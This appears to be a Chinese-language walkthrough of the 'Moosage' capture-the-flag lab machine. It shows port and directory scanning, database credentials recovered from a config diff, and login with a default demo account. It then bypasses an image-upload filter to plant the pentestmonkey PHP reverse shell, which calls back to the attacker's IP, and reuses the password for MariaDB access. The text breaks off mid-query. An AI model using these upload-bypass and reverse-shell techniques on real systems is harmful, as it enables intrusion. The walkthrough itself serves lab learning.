![\"image-20250616175406533\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040117.png\")
<\/div>\n
![\"image-20250616220926337\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040119.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nYou miss 100% of the ports you don't scan. - RustScan\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.106:22\nOpen 192.168.10.106:80\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n| 2048 02:65:e6:05:af:c8:81:9c:30:b0:da:e3:1e:d8:be:02 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDv+qPYyD6jIW9PZIAMgz4ojpJlvs2EWCtw4GyIHiX3\/UMJ0qISwj04rljLXmmvTALNi9GYKPDlnh7vrAKbnKhIhef114wHFrPjTMNI7m+nEqvN0yuxGmS6oIHkzz5sNXvxSnVRfqqpFheZqXmY5qrrcSV+TgFKEZs94WzZFp7yzyDX4AnU+Mp7AMrZzYEtDqLFJBviK27rTZ9RJqmH9VTiHENSr0+UHTLPKVxnKCdPuAXLmbd167bQsMdoQ5\/Rn7RgUbwjF8hSpgrRvJ9pAuLrNIEGe1zeeVoZTZmpn8yvjVKDNV2qOh69mf+uam9r\/KrDqr1b7QGiRnIBXryAUBwv\n| 256 3f:7d:4b:86:8d:c7:01:8f:b3:56:6d:65:c2:e5:cf:4e (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNW4D2ORbPVJ9OINylplX0ks+ihYcAng5XYoc1anWtC9jJstK9F01AivJdESyyEPmA+qnN9\/uPnhS8aXYirauwc=\n| 256 8e:d4:b8:d6:8e:d9:61:a1:3e:7f:5e:d7:ec:dc:bb:de (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAAlNJzSVpE+7Dt7rN2EgYoqsw+pS9EhnA9x9L\/iwHVH\n80\/tcp open http syn-ack ttl 64 nginx 1.14.2\n| http-methods: \n|_ Supported Methods: GET HEAD POST\n|_http-title: 403 Forbidden\n|_http-server-header: nginx\/1.14.2\nMAC Address: 08:00:27:97:77:DD (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html txt php 2>\/dev\/null\n\n404 GET 7l 12w 169c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n301 GET 7l 12w 185c http:\/\/192.168.10.106\/blog => http:\/\/192.168.10.106\/blog\/\n403 GET 7l 10w 169c http:\/\/192.168.10.106\/\n200 GET 508l 1672w 18089c http:\/\/192.168.10.106\/blog\/static\/scripts\/lightbox.js\n200 GET 4l 1292w 86351c http:\/\/192.168.10.106\/blog\/static\/scripts\/jquery.min.js\n200 GET 10l 27w 1404c http:\/\/192.168.10.106\/blog\/static\/images\/profile.jpg\n200 GET 14l 61w 3142c http:\/\/192.168.10.106\/blog\/static\/images\/profile_big.jpg\n200 GET 4l 10w 438c http:\/\/192.168.10.106\/blog\/static\/images\/zpEYXu5Wdu6.png\n200 GET 44l 3937w 100276c http:\/\/192.168.10.106\/blog\/static\/scripts\/highlight-10.1.2.min.js\n200 GET 213l 403w 3891c http:\/\/192.168.10.106\/blog\/static\/styles\/lightbox.css\n200 GET 292l 921w 7770c http:\/\/192.168.10.106\/blog\/static\/scripts\/autosize.js\n200 GET 83l 105w 1026c http:\/\/192.168.10.106\/blog\/static\/styles\/highlight-monokai-sublime.css\n200 GET 140l 288w 2330c http:\/\/192.168.10.106\/blog\/static\/styles\/main.css\n200 GET 198l 440w 4317c http:\/\/192.168.10.106\/blog\/static\/scripts\/datepick.js\n200 GET 1293l 2393w 23974c http:\/\/192.168.10.106\/blog\/static\/styles\/theme02.css\n200 GET 1102l 2150w 25882c http:\/\/192.168.10.106\/blog\/static\/scripts\/app.js\n200 GET 268l 683w 10091c http:\/\/192.168.10.106\/blog\/index.php\n403 GET 7l 10w 169c http:\/\/192.168.10.106\/blog\/static\/styles\/\n403 GET 7l 10w 169c http:\/\/192.168.10.106\/blog\/static\/images\/\n403 GET 7l 10w 169c http:\/\/192.168.10.106\/blog\/static\/\n301 GET 7l 12w 185c http:\/\/192.168.10.106\/blog\/static\/images => http:\/\/192.168.10.106\/blog\/static\/images\/\n301 GET 7l 12w 185c http:\/\/192.168.10.106\/blog\/data => http:\/\/192.168.10.106\/blog\/data\/\n200 GET 0l 0w 0c http:\/\/192.168.10.106\/blog\/common.php\n403 GET 7l 10w 169c http:\/\/192.168.10.106\/blog\/static\/scripts\/\n301 GET 7l 12w 185c http:\/\/192.168.10.106\/blog\/static => http:\/\/192.168.10.106\/blog\/static\/\n301 GET 7l 12w 185c http:\/\/192.168.10.106\/blog\/static\/scripts => http:\/\/192.168.10.106\/blog\/static\/scripts\/\n200 GET 1l 3w 47c http:\/\/192.168.10.106\/blog\/ajax.php\n301 GET 7l 12w 185c http:\/\/192.168.10.106\/blog\/app => http:\/\/192.168.10.106\/blog\/app\/\n301 GET 7l 12w 185c http:\/\/192.168.10.106\/blog\/app\/db => http:\/\/192.168.10.106\/blog\/app\/db\/\n301 GET 7l 12w 185c http:\/\/192.168.10.106\/blog\/static\/styles => http:\/\/192.168.10.106\/blog\/static\/styles\/\n200 GET 2l 4w 25c http:\/\/192.168.10.106\/blog\/robots.txt\n301 GET 7l 12w 185c http:\/\/192.168.10.106\/blog\/app\/lang => http:\/\/192.168.10.106\/blog\/app\/lang\/\n200 GET 674l 5644w 35149c http:\/\/192.168.10.106\/blog\/LICENSE\n301 GET 7l 12w 185c http:\/\/192.168.10.106\/blog\/app\/db\/mysql => http:\/\/192.168.10.106\/blog\/app\/db\/mysql\/<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
![\"image-20250616221408401\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div>
\n<\/div><\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ curl http:\/\/192.168.10.106\/blog\/robots.txt \nUser-agent: *\nDisallow: \/ \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ whatweb http:\/\/$IP\/blog\nhttp:\/\/192.168.10.106\/blog [301 Moved Permanently] Country[RESERVED][ZZ], HTTPServer[nginx\/1.14.2], IP[192.168.10.106], RedirectLocation[http:\/\/192.168.10.106\/blog\/], Title[301 Moved Permanently], nginx[1.14.2]\nhttp:\/\/192.168.10.106\/blog\/ [200 OK] Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[nginx\/1.14.2], HttpOnly[PHPSESSID], IP[192.168.10.106], JQuery, Lightbox, PasswordField[password], Script, Title[Blog], X-UA-Compatible[IE=edge], nginx[1.14.2]<\/code><\/pre>\n\u770b\u4e00\u4e0b\u8fd9\u4e2a\u535a\u5ba2\u662f\u4e0d\u662f\u5565\u5f00\u6e90\u7684\u535a\u5ba2\uff1a<\/p>\n
<\/div><\/p>\n\u5f00\u6e90\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u989d\uff0c\u597d\u50cf\u90fd\u662f\u4e2a\u4eba\u4e3b\u9875\u3002\u3002\u3002\u770b\u4e00\u4e0b\u5728\u4e0d\u5728\u91cc\u9762\uff0c\u7136\u540e\u5c31\u6392\u5230\u4e86\uff1ahttps:\/\/github.com\/m1k1o\/blog<\/a><\/p>\n\u5bf9\u6bd4\u4e00\u4e0b\u4fe1\u606f\u641c\u96c6\u7684\u7ed3\u679c\uff0c\u53d1\u73b0\u662f\u57fa\u672c\u4e00\u6837\u7684\uff0c\u67e5\u770b\u4e00\u4e0b\u9ed8\u8ba4\u7684\u7528\u6237\u540d\u548c\u5bc6\u7801\uff0c\u770b\u770b\u662f\u5426\u5b58\u5728\u5229\u7528\u70b9\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ tree .\/blog\/\n.\/blog\/\n\u251c\u2500\u2500 ajax.php\n\u251c\u2500\u2500 app\n\u2502 \u251c\u2500\u2500 ajax.class.php\n\u2502 \u251c\u2500\u2500 config.class.php\n\u2502 \u251c\u2500\u2500 db\n\u2502 \u2502 \u251c\u2500\u2500 mysql\n\u2502 \u2502 \u2502 \u2514\u2500\u2500 01_schema.sql\n\u2502 \u2502 \u251c\u2500\u2500 postgres\n\u2502 \u2502 \u2502 \u2514\u2500\u2500 01_schema.sql\n\u2502 \u2502 \u2514\u2500\u2500 sqlite\n\u2502 \u2502 \u2514\u2500\u2500 01_schema.sql\n\u2502 \u251c\u2500\u2500 db.class.php\n\u2502 \u251c\u2500\u2500 image.class.php\n\u2502 \u251c\u2500\u2500 jbbcode\n\u2502 \u2502 \u251c\u2500\u2500 codedefinitionbuilder.class.php\n\u2502 \u2502 \u251c\u2500\u2500 codedefinition.class.php\n\u2502 \u2502 \u251c\u2500\u2500 codedefinitionset.class.php\n\u2502 \u2502 \u251c\u2500\u2500 defaultcodedefinitionset.class.php\n\u2502 \u2502 \u251c\u2500\u2500 documentelement.class.php\n\u2502 \u2502 \u251c\u2500\u2500 elementnode.class.php\n\u2502 \u2502 \u251c\u2500\u2500 inputvalidator.class.php\n\u2502 \u2502 \u251c\u2500\u2500 node.class.php\n\u2502 \u2502 \u251c\u2500\u2500 nodevisitor.class.php\n\u2502 \u2502 \u251c\u2500\u2500 parser.class.php\n\u2502 \u2502 \u251c\u2500\u2500 parserexception.class.php\n\u2502 \u2502 \u251c\u2500\u2500 textnode.class.php\n\u2502 \u2502 \u251c\u2500\u2500 tokenizer.class.php\n\u2502 \u2502 \u251c\u2500\u2500 validators\n\u2502 \u2502 \u2502 \u251c\u2500\u2500 csscolorvalidator.class.php\n\u2502 \u2502 \u2502 \u2514\u2500\u2500 urlvalidator.class.php\n\u2502 \u2502 \u2514\u2500\u2500 visitors\n\u2502 \u2502 \u2514\u2500\u2500 nestlimitvisitor.class.php\n\u2502 \u251c\u2500\u2500 lang\n\u2502 \u2502 \u251c\u2500\u2500 bs.ini\n\u2502 \u2502 \u251c\u2500\u2500 cz.ini\n\u2502 \u2502 \u251c\u2500\u2500 de.ini\n\u2502 \u2502 \u251c\u2500\u2500 en.ini\n\u2502 \u2502 \u251c\u2500\u2500 es.ini\n\u2502 \u2502 \u251c\u2500\u2500 fr.ini\n\u2502 \u2502 \u251c\u2500\u2500 nl.ini\n\u2502 \u2502 \u251c\u2500\u2500 ru.ini\n\u2502 \u2502 \u251c\u2500\u2500 sk.ini\n\u2502 \u2502 \u2514\u2500\u2500 zh.ini\n\u2502 \u251c\u2500\u2500 lang.class.php\n\u2502 \u251c\u2500\u2500 log.class.php\n\u2502 \u251c\u2500\u2500 post.class.php\n\u2502 \u251c\u2500\u2500 splclassloader.class.php\n\u2502 \u2514\u2500\u2500 user.class.php\n\u251c\u2500\u2500 common.php\n\u251c\u2500\u2500 config.ini\n\u251c\u2500\u2500 data\n\u251c\u2500\u2500 docker-compose.yml\n\u251c\u2500\u2500 Dockerfile\n\u251c\u2500\u2500 favicon.ico\n\u251c\u2500\u2500 index.php\n\u251c\u2500\u2500 LICENSE\n\u251c\u2500\u2500 README.md\n\u251c\u2500\u2500 robots.txt\n\u2514\u2500\u2500 static\n \u251c\u2500\u2500 images\n \u2502 \u251c\u2500\u2500 bNvHN6v1NeH.png\n \u2502 \u251c\u2500\u2500 close.png\n \u2502 \u251c\u2500\u2500 JNPO3NqYHEj.png\n \u2502 \u251c\u2500\u2500 loading.gif\n \u2502 \u251c\u2500\u2500 next.png\n \u2502 \u251c\u2500\u2500 prev.png\n \u2502 \u251c\u2500\u2500 profile_big.jpg\n \u2502 \u251c\u2500\u2500 profile.jpg\n \u2502 \u251c\u2500\u2500 QijIVO3ZIrO.png\n \u2502 \u251c\u2500\u2500 star.png\n \u2502 \u251c\u2500\u2500 theme01\n \u2502 \u2502 \u251c\u2500\u2500 7W9WiMukPsP.png\n \u2502 \u2502 \u251c\u2500\u2500 B89i4luGsIu.png\n \u2502 \u2502 \u251c\u2500\u2500 CAGlHC-HRGh.png\n \u2502 \u2502 \u251c\u2500\u2500 Jid5DW8pIwZ.png\n \u2502 \u2502 \u251c\u2500\u2500 opUxrh_sBcu.png\n \u2502 \u2502 \u251c\u2500\u2500 pkJbsArvXFu.png\n \u2502 \u2502 \u251c\u2500\u2500 tools.png\n \u2502 \u2502 \u251c\u2500\u2500 W9Z74j1GbH2.png\n \u2502 \u2502 \u251c\u2500\u2500 wKDzFUeiPd3.png\n \u2502 \u2502 \u2514\u2500\u2500 y_KJ3X1mNCs.png\n \u2502 \u251c\u2500\u2500 theme02\n \u2502 \u2502 \u251c\u2500\u2500 2CGkY1_Ax_-.png\n \u2502 \u2502 \u251c\u2500\u2500 38mmIT7r0jG.png\n \u2502 \u2502 \u251c\u2500\u2500 7wYk0RRj5-g.png\n \u2502 \u2502 \u251c\u2500\u2500 7_Yye-V3r9M.png\n \u2502 \u2502 \u251c\u2500\u2500 amepTQ7nV0z.png\n \u2502 \u2502 \u251c\u2500\u2500 BOCzaD2rwOa.png\n \u2502 \u2502 \u251c\u2500\u2500 BvwOjzIAV9T.png\n \u2502 \u2502 \u251c\u2500\u2500 gc6VwTsu2qZ.png\n \u2502 \u2502 \u251c\u2500\u2500 HxCo9uaZIcB.png\n \u2502 \u2502 \u251c\u2500\u2500 IBOXrWGhcIu.png\n \u2502 \u2502 \u251c\u2500\u2500 jcKElmriUSj.png\n \u2502 \u2502 \u251c\u2500\u2500 kOtcUC5Tvlq.png\n \u2502 \u2502 \u251c\u2500\u2500 LiJKvoYFmUK.png\n \u2502 \u2502 \u251c\u2500\u2500 mHY-L01FIF0.png\n \u2502 \u2502 \u251c\u2500\u2500 qZPl7lx7zY1.png\n \u2502 \u2502 \u251c\u2500\u2500 THYN1-y3aPS.png\n \u2502 \u2502 \u251c\u2500\u2500 W5IvJHzSLg7.png\n \u2502 \u2502 \u251c\u2500\u2500 Xe-tUjaQ4vo.png\n \u2502 \u2502 \u251c\u2500\u2500 xGM66u5seRO.png\n \u2502 \u2502 \u2514\u2500\u2500 YFO-fzIJZ2K.png\n \u2502 \u251c\u2500\u2500 trophy.png\n \u2502 \u251c\u2500\u2500 UgNUNkKQar6.png\n \u2502 \u2514\u2500\u2500 zpEYXu5Wdu6.png\n \u251c\u2500\u2500 screenshot-theme01.png\n \u251c\u2500\u2500 screenshot-theme02-dark.png\n \u251c\u2500\u2500 screenshot-theme02-light.png\n \u251c\u2500\u2500 scripts\n \u2502 \u251c\u2500\u2500 app.js\n \u2502 \u251c\u2500\u2500 autosize.js\n \u2502 \u251c\u2500\u2500 datepick.js\n \u2502 \u251c\u2500\u2500 highlight-10.1.2.min.js\n \u2502 \u251c\u2500\u2500 jquery.min.js\n \u2502 \u2514\u2500\u2500 lightbox.js\n \u2514\u2500\u2500 styles\n \u251c\u2500\u2500 highlight-monokai-sublime.css\n \u251c\u2500\u2500 lightbox.css\n \u251c\u2500\u2500 main.css\n \u251c\u2500\u2500 theme01.css\n \u2514\u2500\u2500 theme02.css\n\n17 directories, 105 files<\/code><\/pre>\n\u9996\u5148\u770b\u4e00\u4e0b\u914d\u7f6e\u6587\u4ef6\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ cat blog\/config.ini \n[database]\ndb_connection = sqlite\n;sqlite_db = data\/sqlite.db\n\n;[database]\n;db_connection = mysql\n;mysql_socket = \/tmp\/mysql.sock\n;mysql_host = localhost\n;mysql_port = 3306\n;mysql_user = root\n;mysql_pass = root\n;db_name = blog\n\n;[database]\n;db_connection = postgres\n;postgres_socket = \/tmp\/postgres.sock\n;postgres_host = localhost\n;postgres_port = 5432\n;postgres_user = root\n;postgres_pass = root\n;db_name = blog\n\n[profile]\ntitle = Blog\nname = Max Musermann\npic_small = static\/images\/profile.jpg\npic_big = static\/images\/profile_big.jpg\n;cover = static\/images\/cover.jpg\n\n[language]\nlang = en\n\n[components]\nhighlight = true\n\n[custom]\ntheme = theme02\n;header = data\/header.html\n;styles[] = static\/styles\/custom1.css\n;styles[] = static\/styles\/custom2.css\n;scripts = static\/styles\/scripts.css\n;footer = "Edit this if you really want to remove my backlink :("\n\n[bbcode]\n;bbtags[quote] = "<quote>{param}<\/quote>"\n\n[admin] # \u7cfb\u7edf\u5f3a\u5236\u767b\u5f55\uff0c\u5e76\u9884\u8bbe\u4e86\u4e00\u4e2a\u7528\u6237\u540d\u4e3a demo\u3001\u5bc6\u7801\u4e3a demo \u7684\u6d4b\u8bd5\u8d26\u6237\nforce_login = true\nnick = demo\npass = demo\n\n[friends]\n;friends[user] = pass\n;friends[user] = pass\n\n[directories]\nimages_path = data\/i\/\nthumbnails_path = data\/t\/\nlogs_path = data\/logs\/\n\n[proxy]\n;proxy = hostname:port\n;proxyauth = username:password\n;proxytype = CURLPROXY_HTTP ; default, if not set\n;proxytype = CURLPROXY_SOCKS4\n;proxytype = CURLPROXY_SOCKS5\n\n;URL_PREFIX type:\n;proxy = http:\/\/your.page.com\/proxy.cgi?\n;proxyauth = username:password\n;proxytype = URL_PREFIX\n\n[system]\n;timezone = Europe\/Vienna\nversion = 1.42\ndebug = false\nlogs = false<\/code><\/pre>\n\u53d1\u73b0\u5b58\u5728\u5173\u4e8e\u7528\u6237\u4fe1\u606f\u7684\u914d\u7f6e\uff0c\u770b\u4e00\u4e0b\u9776\u673a\u7684\u6709\u54ea\u4e9b\u4fe1\u606f\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ cat blog\/config.ini > config1\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ curl -s http:\/\/$IP\/blog\/config.ini > config2 \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ diff config1 config2 \n6,21c6,12\n< ;db_connection = mysql\n< ;mysql_socket = \/tmp\/mysql.sock\n< ;mysql_host = localhost\n< ;mysql_port = 3306\n< ;mysql_user = root\n< ;mysql_pass = root\n< ;db_name = blog\n< \n< ;[database]\n< ;db_connection = postgres\n< ;postgres_socket = \/tmp\/postgres.sock\n< ;postgres_host = localhost\n< ;postgres_port = 5432\n< ;postgres_user = root\n< ;postgres_pass = root\n< ;db_name = blog\n---\n> db_connection = mysql\n> mysql_socket = \/run\/mysqld\/mysqld.sock\n> mysql_host = localhost\n> mysql_port = 3306\n> mysql_user = baca\n> mysql_pass = youareinsane\n> db_name = moosage\n42d32\n< ;footer = "Edit this if you really want to remove my backlink :("\n75c65,66\n< version = 1.42\n---\n> system_name = blog\n> version = 1.3<\/code><\/pre>\n\u53d1\u73b0\u4e86\u7248\u672c\u4e0d\u4e00\u6837\uff0c\u4ee5\u53ca\u4e00\u4e2a\u6570\u636e\u5e93\u51ed\u8bc1\uff1abaca:youareinsane<\/code>\uff0c\u770b\u4e00\u4e0b\u662f\u5426\u5b58\u5728 ssh \u590d\u7528\uff0c\u4f46\u662f\u5e76\u672a\u6210\u529f\uff0c\u6ce8\u610f\u5230\u914d\u7f6e\u6587\u4ef6\u7cfb\u7edf\u5f3a\u5236\u767b\u5f55\uff0c\u5e76\u9884\u8bbe\u4e86\u4e00\u4e2a\u7528\u6237\u540d\u4e3a demo<\/code>\u3001\u5bc6\u7801\u4e3a demo<\/code> \u7684\u6d4b\u8bd5\u8d26\u6237<\/strong>\uff0c\u5c1d\u8bd5demo:demo<\/code>\u8fdb\u884c\u767b\u5f55\u3002<\/p>\n<\/div><\/p>\n\u6210\u529f\u767b\u5f55\uff01<\/p>\n
\u56fe\u7247\u9690\u85cfshell\u53cd\u5f39\uff08\u542b\u8bd5\u9519\uff09<\/h3>\n
\uff08\u4e0b\u9762\u8fdb\u884c\u4e86\u90e8\u5206\u8bd5\u9519\uff0c\u522b\u7167\u6284\u6d6a\u8d39\u65f6\u95f4\u54e6\uff09<\/strong><\/p>\n<\/div><\/p>\n\u53d1\u73b0\u5199\u6587\u7ae0\u7684\u5730\u65b9\u53ef\u4ee5\u4e0a\u4f20\u56fe\u7247\uff0c\u968f\u4fbf\u4f20\u4e00\u4e2a\u4e0a\u53bb\u770b\u770b\uff01<\/p>\n
\nPS\uff1a\u8bb0\u5f97\u6a21\u5f0f\u6539\u4e3a Public\uff01\uff01\uff01<\/strong><\/p>\n<\/blockquote>\n<\/div><\/p>\n\u53d1\u73b0\u94fe\u63a5\u5730\u5740\u4e3a\uff1a<\/p>\n
http:\/\/192.168.10.106\/blog\/data\/i\/13x5.jpg<\/code><\/pre>\n\u5c1d\u8bd5\u4e0a\u4f20\u53cd\u5f39shell\uff01\uff01\uff01\uff01<\/p>\n
<\/div><\/p>\n\u7136\u540e\u8bbe\u7f6e\u76d1\u542c\u8fdb\u884c\u4e0a\u4f20\uff0c\u53d1\u73b0\u4e0d\u5b58\u5728\u62a5\u9519\uff0c\u4f46\u662f\u5565\u90fd\u6ca1\u663e\u793a\uff0c\u968f\u4fbf\u5199\u4e2a\u9898\u76ee\u53d1\u5e03\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u5565\u90fd\u6ca1\uff0c\u73b0\u5728\u53ef\u4ee5\u5c1d\u8bd5\u4e24\u79cd\u65b9\u6cd5\uff0c\u4e00\u662f\u63a2\u7d22\u547d\u540d\u89c4\u5219\uff0c\u8fdb\u884c\u7206\u7834\u6216\u8005\u5565\uff0c\u53e6\u4e00\u79cd\u662f\u770b\u4e00\u4e0b\u8fd4\u56de\u5305\uff1a<\/p>\n
\u7531\u4e8e\u4e0a\u4e00\u4e2a\u56fe\u7247\u540d\u4e3a\uff1a13x5<\/code>\uff0c\u6240\u4ee5\u731c\u6d4b\u662f\u4fee\u6539\u4e86\u6587\u4ef6\u540d\uff0c\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0b\u4e24\u4f4d\u5230\u4e00\u4f4d\u7684\u7ec4\u5408\uff0c\u4ee5\u53ca\u540e\u7f00\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ for i in {1..99}; do for j in {1..99}; do url="http:\/\/192.168.10.106\/blog\/data\/i\/${i}x${j}.jpg"; curl -s -I --head "$url" | grep -q "200 OK" && echo "$url exists" || echo "$url missing"; done; done | grep -v missing\nhttp:\/\/192.168.10.106\/blog\/data\/i\/13x5.jpg exists<\/code><\/pre>\n\u53d1\u73b0\u6ca1\u627e\u5230\uff0c\u4e0a\u4f20\u4e86\u4e00\u4e0b\u53d1\u73b0gif<\/code>\u4e0a\u4f20\u8def\u5f84\u8fd8\u4e0d\u592a\u4e00\u6837\u3002\u3002\u3002<\/p>\nhttp:\/\/192.168.10.106\/blog\/data\/t\/3k94.gif<\/code><\/pre>\n\u770b\u6765\u4e0a\u4f20\u7684\u65f6\u5019\uff0c\u540e\u7f00\u4e0d\u80fd\u6539\u4e3aGIF<\/code>\u3002\u3002\u3002\u3002\u91cd\u65b0\u8fdb\u884c\u4e0a\u4f20\uff1a<\/p>\n<\/div><\/p>\n\u597d\u4e86\uff0c\u4e0d\u7528\u518d\u7ea0\u7ed3\u4e86\u3002\u3002\u3002\u3002\u3002\u4f46\u662f\u53d1\u73b0\u5e76\u672a\u8fdb\u884c\u89e3\u6790\uff0c\u4fee\u6539\u540e\u7f00\u4e3aphp\uff0c\u91cd\u65b0\u4e0a\u4f20\uff1a<\/p>\n
<\/div><\/p>\n\u6293\u5305\u6539\u5305\u8fdb\u884c\u4e0a\u4f20\uff0c\u4e2d\u9014\u53d1\u73b0\u5b58\u5728\u524d\u7aef\u8ba4\u8bc1\uff0c\u4fee\u6539\u4e00\u4e0b\u540e\u7f00\uff0c\u7b49\u4e0b\u6293\u5305\u518d\u6539\u56de\u6765\u3002\u3002\u3002\u65e9\u77e5\u9053\u76f4\u63a5\u6293\u5305\u4e86\uff0c\u4e3a\u4e86\u7701\u4e8b\u8fd8\u6d6a\u8d39\u66f4\u591a\u65f6\u95f4\u3002\u3002\u3002\u3002<\/p>\n
POST \/blog\/ajax.php?action=upload_image HTTP\/1.1\nHost: 192.168.10.106\nReferer: http:\/\/192.168.10.106\/blog\/\nOrigin: http:\/\/192.168.10.106\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/137.0.0.0 Safari\/537.36\nAccept: application\/json, text\/javascript, *\/*; q=0.01\nContent-Type: multipart\/form-data; boundary=----WebKitFormBoundaryKz0K0OZnM3LuzHDJ\nCsrf-Token: 19fbb9deda\nAccept-Language: zh-CN,zh;q=0.9\nCookie: PHPSESSID=kc59al1coqm724jhfn0139ck89\nContent-Length: 4098\n\n------WebKitFormBoundaryKz0K0OZnM3LuzHDJ\nContent-Disposition: form-data; name="file"; filename="rev.jpg"\nContent-Type: image\/jpeg\n\nGIF89a\n <?php\n \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n set_time_limit (0);\n $VERSION = "1.0";\n $ip = '192.168.10.107'; \/\/ You have changed this\n $port = 1234; \/\/ And this\n $chunk_size = 1400;\n $write_a = null;\n $error_a = null;\n $shell = 'uname -a; w; id; \/bin\/sh -i';\n $daemon = 0;\n $debug = 0;<\/code><\/pre>\n\u7136\u540e\u4fee\u6539\u4ee5\u540e\u8fdb\u884c\u4e0a\u4f20\u53d1\u73b0\u6210\u529f\uff1a<\/p>\n
<\/div><\/p>\n\u5c1d\u8bd5\u8bbf\u95ee\u6fc0\u6d3b\uff0c\u53d1\u73b0\u4ecd\u7136\u672a\u89e3\u6790\uff1a<\/p>\n
<\/div><\/p>\n\u91cd\u65b0\u4fee\u6539\u4e0a\u4f20\u6587\u4ef6\u7c7b\u578b\uff0c\u6210\u529f\u53cd\u5f39shell\uff01\uff01\uff01\uff01<\/p>\n
<\/div><\/p>\n\u5c1d\u8bd5\u6fc0\u6d3b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ curl -s "http:\/\/$IP\/blog\/data\/i\/52Cp.php" \n<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u5bc6\u7801\u590d\u7528\u5207\u6362\u7528\u6237<\/h3>\n
\u4e4b\u524d\u5f97\u5230\u4e86\u6570\u636e\u5e93\u7684\u7528\u6237\u5bc6\u7801\uff0c\u90fd\u4e0d\u662f\u9ed8\u8ba4\u7684\u4e86\uff0c\u731c\u6d4b\u6709\u4fe1\u606f\u5728\u91cc\u9762\uff0c\u8fdb\u884c\u6d4b\u8bd5 baca:youareinsane<\/code>\uff1a<\/p>\n(remote) www-data@moosage:\/$ mysql -u baca -p\nEnter password: \nWelcome to the MariaDB monitor. Commands end with ; or \\g.\nYour MariaDB connection id is 66\nServer version: 10.3.27-MariaDB-0+deb10u1 Debian 10\n\nCopyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.\n\nType 'help;' or '\\h' for help. Type '\\c' to clear the current input statement.\n\nMariaDB [(none)]> show databases;\n+--------------------+\n| Database |\n+--------------------+\n| information_schema |\n| moosage |\n+--------------------+\n2 rows in set (0.000 sec)\n\nMariaDB [(none)]> use moosage;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nMariaDB [moosage]> show tables;\n+-------------------+\n| Tables_in_moosage |\n+-------------------+\n| images |\n| posts |\n+-------------------+\n2 rows in set (0.000 sec)\n\nMariaDB [moosage]> select * from images;posts;\n+----+-------------------------------------------+-----------------+-----------------+------+----------------------------------+---------------------+--------+\n| id | name | path | thumb | type | md5 | datetime | status |\n+----+-------------------------------------------+-----------------+-----------------+------+----------------------------------+---------------------+--------+\n| 1 | 